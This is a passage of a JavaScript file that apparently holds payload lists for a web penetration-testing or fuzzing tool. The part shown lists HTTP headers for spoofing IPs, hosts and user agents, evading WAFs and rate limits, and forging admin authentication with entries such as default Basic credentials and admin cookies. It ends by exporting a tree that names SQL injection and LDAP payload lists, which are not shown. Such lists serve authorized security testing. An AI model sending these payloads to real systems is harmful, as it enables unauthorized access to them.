  { name: "X-Source-IP: 127.0.0.1", payload: "X-Source-IP: 127.0.0.1" },
  { name: "X-Backend-IP: 127.0.0.1", payload: "X-Backend-IP: 127.0.0.1" },
  { name: "X-Forwarded-For-Original: 127.0.0.1", payload: "X-Forwarded-For-Original: 127.0.0.1" },
  { name: "CF-Connecting-IP: 127.0.0.1", payload: "CF-Connecting-IP: 127.0.0.1" },
  { name: "X-Forwarded-For: 127.0.0.1, 0.0.0.0", payload: "X-Forwarded-For: 127.0.0.1, 0.0.0.0" },
  { name: "X-Forwarded-For: 127.0.0.1, 127.0.0.2", payload: "X-Forwarded-For: 127.0.0.1, 127.0.0.2" },
  // ────────── USER‑AGENT SPOOFING ──────────────────────────
  { name: "User-Agent: Googlebot", payload: "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" },
  { name: "User-Agent: Bingbot", payload: "User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" },
  { name: "User-Agent: Baiduspider", payload: "User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" },
  { name: "User-Agent: YandexBot", payload: "User-Agent: Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" },
  { name: "User-Agent: DuckDuckBot", payload: "User-Agent: DuckDuckBot/1.0; (+http://duckduckgo.com/duckduckbot.html)" },
  { name: "User-Agent: Sogou", payload: "User-Agent: Sogou web spider/4.0 (+http://www.sogou.com/docs/help/webmasters.htm#07)" },
  { name: "User-Agent: Exabot", payload: "User-Agent: Exabot/3.0; (+http://www.exabot.com/go/robot)" },
  { name: "User-Agent: iPhone", payload: "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" },
  { name: "User-Agent: Android", payload: "User-Agent: Mozilla/5.0 (Linux; Android 10; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36" },
  { name: "User-Agent: Edge", payload: "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59" },
  { name: "User-Agent: Firefox ESR", payload: "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0" },
  { name: "User-Agent: Chrome", payload: "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" },
  { name: "User-Agent: Safari", payload: "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15" },
  { name: "User-Agent: curl", payload: "User-Agent: curl/7.68.0" },
  { name: "User-Agent: wget", payload: "User-Agent: Wget/1.20.3 (linux-gnu)" },
  { name: "User-Agent: python-requests", payload: "User-Agent: python-requests/2.25.1" },
  { name: "User-Agent: Nmap", payload: "User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" },
  { name: "User-Agent: Postman", payload: "User-Agent: PostmanRuntime/7.26.8" },
  { name: "User-Agent: Burp Suite", payload: "User-Agent: Mozilla/5.0 (compatible; BurpSuite; +https://portswigger.net/burp)" },
  // ────────── CACHE & PRAGMA ────────────────────────────────
  { name: "Cache-Control: no-cache", payload: "Cache-Control: no-cache" },
  { name: "Cache-Control: no-store", payload: "Cache-Control: no-store" },
  { name: "Cache-Control: max-age=0", payload: "Cache-Control: max-age=0" },
  { name: "Pragma: no-cache", payload: "Pragma: no-cache" },
  // ────────── HOST / ORIGIN OVERRIDES ──────────────────────
  { name: "Host: 127.0.0.1", payload: "Host: 127.0.0.1" },
  { name: "Host: localhost", payload: "Host: localhost" },
  { name: "Host: target.com", payload: "Host: target.com" },
  { name: "X-Forwarded-Host: target.com", payload: "X-Forwarded-Host: target.com" },
  { name: "X-Original-URL: /admin", payload: "X-Original-URL: /admin" },
  { name: "X-Rewrite-URL: /admin", payload: "X-Rewrite-URL: /admin" },
  { name: "X-Override-Host: target.com", payload: "X-Override-Host: target.com" },
  { name: "X-Forwarded-Host: 127.0.0.1", payload: "X-Forwarded-Host: 127.0.0.1" },
  { name: "Host: 0.0.0.0", payload: "Host: 0.0.0.0" },
  { name: "Host: 10.0.0.1", payload: "Host: 10.0.0.1" },
  { name: "Host: 192.168.1.1", payload: "Host: 192.168.1.1" },
  // ────────── METHOD OVERRIDES ──────────────────────────────
  { name: "X-HTTP-Method-Override: GET", payload: "X-HTTP-Method-Override: GET" },
  { name: "X-HTTP-Method-Override: POST", payload: "X-HTTP-Method-Override: POST" },
  { name: "X-HTTP-Method-Override: PUT", payload: "X-HTTP-Method-Override: PUT" },
  { name: "X-HTTP-Method-Override: DELETE", payload: "X-HTTP-Method-Override: DELETE" },
  { name: "X-HTTP-Method-Override: PATCH", payload: "X-HTTP-Method-Override: PATCH" },
  { name: "X-HTTP-Method-Override: OPTIONS", payload: "X-HTTP-Method-Override: OPTIONS" },
  { name: "X-HTTP-Method-Override: HEAD", payload: "X-HTTP-Method-Override: HEAD" },
  { name: "X-HTTP-Method-Override: TRACE", payload: "X-HTTP-Method-Override: TRACE" },
  { name: "X-HTTP-Method-Override: CONNECT", payload: "X-HTTP-Method-Override: CONNECT" },
  { name: "X-Method-Override: GET", payload: "X-Method-Override: GET" },
  { name: "X-Method-Override: POST", payload: "X-Method-Override: POST" },
  { name: "X-Method-Override: PUT", payload: "X-Method-Override: PUT" },
  // ────────── PROTOCOL SPOOFING ─────────────────────────────
  { name: "X-Forwarded-Proto: http", payload: "X-Forwarded-Proto: http" },
  { name: "X-Forwarded-Proto: https", payload: "X-Forwarded-Proto: https" },
  { name: "X-Forwarded-Protocol: http", payload: "X-Forwarded-Protocol: http" },
  { name: "X-Forwarded-Protocol: https", payload: "X-Forwarded-Protocol: https" },
  { name: "X-Forwarded-Ssl: on", payload: "X-Forwarded-Ssl: on" },
  { name: "X-Forwarded-Ssl: off", payload: "X-Forwarded-Ssl: off" },
  { name: "X-Forwarded-Port: 443", payload: "X-Forwarded-Port: 443" },
  { name: "X-Forwarded-Port: 80", payload: "X-Forwarded-Port: 80" },
  { name: "X-Forwarded-Port: 8080", payload: "X-Forwarded-Port: 8080" },
  { name: "X-Forwarded-Scheme: http", payload: "X-Forwarded-Scheme: http" },
  { name: "X-Forwarded-Scheme: https", payload: "X-Forwarded-Scheme: https" },
  // ────────── AUTHENTICATION BYPASS / ADMIN HEADERS ────────
  { name: "X-Admin: true", payload: "X-Admin: true" },
  { name: "X-Admin: 1", payload: "X-Admin: 1" },
  { name: "X-User: admin", payload: "X-User: admin" },
  { name: "X-User: root", payload: "X-User: root" },
  { name: "X-Auth: true", payload: "X-Auth: true" },
  { name: "X-Auth-Token: admin", payload: "X-Auth-Token: admin" },
  { name: "X-Debug: true", payload: "X-Debug: true" },
  { name: "X-Developer: true", payload: "X-Developer: true" },
  { name: "X-Privileged: true", payload: "X-Privileged: true" },
  { name: "X-Superuser: true", payload: "X-Superuser: true" },
  { name: "X-Role: admin", payload: "X-Role: admin" },
  { name: "X-IsAdmin: true", payload: "X-IsAdmin: true" },
  { name: "X-Admin-User: admin", payload: "X-Admin-User: admin" },
  // ────────── DEBUG / DEVELOPER HEADERS ─────────────────────
  { name: "X-Debug-Info: true", payload: "X-Debug-Info: true" },
  { name: "X-Debug-Mode: 1", payload: "X-Debug-Mode: 1" },
  { name: "X-Profiler: true", payload: "X-Profiler: true" },
  { name: "X-SQL-Log: true", payload: "X-SQL-Log: true" },
  { name: "X-PHP-Error: true", payload: "X-PHP-Error: true" },
  { name: "X-Show-Errors: true", payload: "X-Show-Errors: true" },
  { name: "X-Display-Errors: true", payload: "X-Display-Errors: true" },
  { name: "X-Trace: true", payload: "X-Trace: true" },
  // ────────── REFERER SPOOFING ──────────────────────────────
  { name: "Referer: https://target.com/admin", payload: "Referer: https://target.com/admin" },
  { name: "Referer: https://target.com/dashboard", payload: "Referer: https://target.com/dashboard" },
  { name: "Referer: https://google.com", payload: "Referer: https://google.com" },
  { name: "Referer: https://bing.com", payload: "Referer: https://bing.com" },
  { name: "Referer: http://localhost", payload: "Referer: http://localhost" },
  { name: "Referer: https://target.com", payload: "Referer: https://target.com" },
  { name: "Referer: https://target.com/", payload: "Referer: https://target.com/" },
  // ────────── CONTENT / ACCEPT OVERRIDES ────────────────────
  { name: "Accept: application/json", payload: "Accept: application/json" },
  { name: "Accept: application/xml", payload: "Accept: application/xml" },
  { name: "Accept: text/html", payload: "Accept: text/html" },
  { name: "Accept: application/octet-stream", payload: "Accept: application/octet-stream" },
  { name: "Accept-Language: en-US,en;q=0.9", payload: "Accept-Language: en-US,en;q=0.9" },
  { name: "Accept-Language: fr-FR,fr;q=0.9", payload: "Accept-Language: fr-FR,fr;q=0.9" },
  { name: "Content-Type: application/json", payload: "Content-Type: application/json" },
  { name: "Content-Type: application/x-www-form-urlencoded", payload: "Content-Type: application/x-www-form-urlencoded" },
  { name: "Content-Type: multipart/form-data", payload: "Content-Type: multipart/form-data" },
  { name: "Content-Type: text/xml", payload: "Content-Type: text/xml" },
  // ────────── CORS-RELATED HEADERS ──────────────────────────
  { name: "Origin: https://target.com", payload: "Origin: https://target.com" },
  { name: "Origin: https://evil.com", payload: "Origin: https://evil.com" },
  { name: "Origin: http://localhost", payload: "Origin: http://localhost" },
  { name: "Origin: null", payload: "Origin: null" },
  { name: "Access-Control-Request-Method: GET", payload: "Access-Control-Request-Method: GET" },
  { name: "Access-Control-Request-Headers: X-Custom", payload: "Access-Control-Request-Headers: X-Custom" },
  // ────────── RATE‑LIMIT BYPASS WITH FAKE TOKENS ────────────
  { name: "X-Forwarded-For: 10.0.0.4", payload: "X-Forwarded-For: 10.0.0.4" },
  { name: "X-Forwarded-For: 10.0.0.5", payload: "X-Forwarded-For: 10.0.0.5" },
  { name: "X-Forwarded-For: 10.0.0.6", payload: "X-Forwarded-For: 10.0.0.6" },
  { name: "X-Forwarded-For: 10.0.0.7", payload: "X-Forwarded-For: 10.0.0.7" },
  { name: "X-Forwarded-For: 10.0.0.8", payload: "X-Forwarded-For: 10.0.0.8" },
  { name: "X-Forwarded-For: 10.0.0.9", payload: "X-Forwarded-For: 10.0.0.9" },
  { name: "X-Forwarded-For: 10.0.0.10", payload: "X-Forwarded-For: 10.0.0.10" },
  { name: "X-Forwarded-For: 192.168.1.2", payload: "X-Forwarded-For: 192.168.1.2" },
  { name: "X-Forwarded-For: 192.168.1.3", payload: "X-Forwarded-For: 192.168.1.3" },
  { name: "X-Forwarded-For: 172.16.0.1", payload: "X-Forwarded-For: 172.16.0.1" },
  // ────────── OTHER INTERESTING HEADERS ─────────────────────
  { name: "X-Requested-With: XMLHttpRequest", payload: "X-Requested-With: XMLHttpRequest" },
  { name: "X-Request-ID: 12345", payload: "X-Request-ID: 12345" },
  { name: "X-Correlation-ID: abc123", payload: "X-Correlation-ID: abc123" },
  { name: "X-Session-ID: admin", payload: "X-Session-ID: admin" },
  { name: "X-Api-Version: 1.0", payload: "X-Api-Version: 1.0" },
  { name: "X-Client-Data: test", payload: "X-Client-Data: test" },
  { name: "X-Forwarded-Server: target.com", payload: "X-Forwarded-Server: target.com" },
  { name: "X-Forwarded-Server: 127.0.0.1", payload: "X-Forwarded-Server: 127.0.0.1" },
  { name: "X-Original-Host: target.com", payload: "X-Original-Host: target.com" },
  { name: "X-Original-Host: 127.0.0.1", payload: "X-Original-Host: 127.0.0.1" },
  { name: "X-Real-Host: target.com", payload: "X-Real-Host: target.com" },
  { name: "X-Real-Host: 127.0.0.1", payload: "X-Real-Host: 127.0.0.1" },
  { name: "X-Alt-Referer: https://target.com", payload: "X-Alt-Referer: https://target.com" },
  { name: "X-Forwarded-Accept: application/json", payload: "X-Forwarded-Accept: application/json" },
  { name: "X-Forwarded-Accept-Encoding: gzip", payload: "X-Forwarded-Accept-Encoding: gzip" },
  { name: "X-Forwarded-User-Agent: Mozilla/5.0", payload: "X-Forwarded-User-Agent: Mozilla/5.0" },
  // ────────── RATE‑LIMIT BYPASS VIA FAKE IP RANGES ──────────
  { name: "X-Forwarded-For: 10.0.0.0/8", payload: "X-Forwarded-For: 10.0.0.0/8" },
  { name: "X-Forwarded-For: 172.16.0.0/12", payload: "X-Forwarded-For: 172.16.0.0/12" },
  { name: "X-Forwarded-For: 192.168.0.0/16", payload: "X-Forwarded-For: 192.168.0.0/16" },
  // ────────── ADDITIONAL WAF EVASION HEADERS ────────────────
  { name: "X-Forwarded-For: 127.0.0.1, 10.0.0.1", payload: "X-Forwarded-For: 127.0.0.1, 10.0.0.1" },
  { name: "X-Forwarded-For: 0.0.0.0, 127.0.0.1", payload: "X-Forwarded-For: 0.0.0.0, 127.0.0.1" },
  { name: "X-Forwarded-For: ::1, 127.0.0.1", payload: "X-Forwarded-For: ::1, 127.0.0.1" },
  { name: "X-Forwarded-For: 127.0.0.1, 127.0.0.2, 127.0.0.3", payload: "X-Forwarded-For: 127.0.0.1, 127.0.0.2, 127.0.0.3" },
  // ────────── CLOUD PROVIDER SPECIFIC ────────────────────────
  { name: "X-Forwarded-For: 169.254.169.254", payload: "X-Forwarded-For: 169.254.169.254" }, // AWS metadata
  { name: "X-Forwarded-For: 100.64.0.1", payload: "X-Forwarded-For: 100.64.0.1" }, // carrier grade NAT
  // ────────── TOKEN / SESSION BYPASS ────────────────────────
  { name: "Authorization: Basic YWRtaW46YWRtaW4=", payload: "Authorization: Basic YWRtaW46YWRtaW4=" }, // admin:admin
  { name: "Authorization: Bearer admin", payload: "Authorization: Bearer admin" },
  { name: "Authorization: Bearer 123456", payload: "Authorization: Bearer 123456" },
  // ────────── COOKIE OVERRIDE ────────────────────────────────
  { name: "Cookie: admin=true", payload: "Cookie: admin=true" },
  { name: "Cookie: user=admin", payload: "Cookie: user=admin" },
  { name: "Cookie: session=admin", payload: "Cookie: session=admin" },
  // ────────── MULTIPLE HEADERS COMBINED (for Intruder) ──────
  // These are just single lines but you can combine them in your tool.
];

// Combine everything into the BYPASS_TREE structure
export const BYPASS_TREE = [
  { group: "Auth Bypass", items: ADMIN },
  { group: "LDAP Fuzz", items: LDAP },
  { group: "SQL Injection (General)", items: SQL_GENERAL },
  { group: "Blind SQL Injection", items: SQL_BLIND },
  { group: "Advanced WAF Bypass – Time Based", items: SQL_WAF_BYPASS },
  { group: "Headers for Bypass", items: BYPASS_HEADERS },
];